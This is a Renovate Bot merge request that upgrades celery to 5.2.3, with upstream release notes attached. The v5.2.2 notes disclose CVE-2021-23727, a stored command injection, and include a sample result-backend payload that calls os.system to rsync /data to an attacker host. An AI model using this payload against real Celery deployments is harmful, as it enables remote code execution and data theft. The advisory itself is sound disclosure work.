Skip to content

Update dependency celery to v5.2.3 (develop) - autoclosed

RenovateBot requested to merge renovate/develop-celery-5.x into develop

This MR contains the following updates:

Package Type Update Change
celery (source, changelog) dependencies minor ==5.1.2 -> ==5.2.3

Release Notes

celery/celery

v5.2.3

Compare Source

=====

:release-date: 2021-12-29 12:00 P.M UTC+6:00 :release-by: Asif Saif Uddin

  • Allow redis >= 4.0.2.
  • Upgrade minimum required pymongo version to 3.11.1.
  • tested pypy3.8 beta (#​6998).
  • Split Signature.or into subclasses' or (#​7135).
  • Prevent duplication in event loop on Consumer restart.
  • Restrict setuptools>=59.1.1,<59.7.0.
  • Kombu bumped to v5.2.3
  • py-amqp bumped to v5.0.9
  • Some docs & CI improvements.

.. _version-5.2.2:

v5.2.2

Compare Source

=====

:release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz

  • Various documentation fixes.

  • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

    When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #​4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data attacker@192.168.56.100:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data attacker@192.168.56.100:~/data as the exception arguments like so:

    .. code-block:: python

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data attacker@192.168.56.100:~/data"
      }

    According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

.. _version-5.2.1:

v5.2.1

Compare Source

=====

:release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

  • Fix rstrip usage on bytes instance in ProxyLogger.
  • Pass logfile to ExecStop in celery.service example systemd file.
  • fix: reduce latency of AsyncResult.get under gevent (#​7052)
  • Limit redis version: <4.0.0.
  • Bump min kombu version to 5.2.2.
  • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
  • Remove dependency to case (#​7077).
  • fix: task expiration is timezone aware if needed (#​7065).
  • Initial testing of pypy-3.8 beta to CI.
  • Docs, CI & tests cleanups.

.. _version-5.2.0:

v5.2.0

Compare Source

=====

:release-date: 2021-11-08 7.15 A.M UTC+6:00 :release-by: Asif Saif Uddin

  • Prevent from subscribing to empty channels (#​7040)
  • fix register_task method.
  • Fire task failure signal on final reject (#​6980)
  • Limit pymongo version: <3.12.1 (#​7041)
  • Bump min kombu version to 5.2.1

.. _version-5.2.0rc2:


Configuration

📅 Schedule: At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever MR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this MR and you won't be reminded about this update again.


  • If you want to rebase/retry this MR, click this checkbox.

This MR has been generated by Renovate Bot.

Edited by RenovateBot

Merge request reports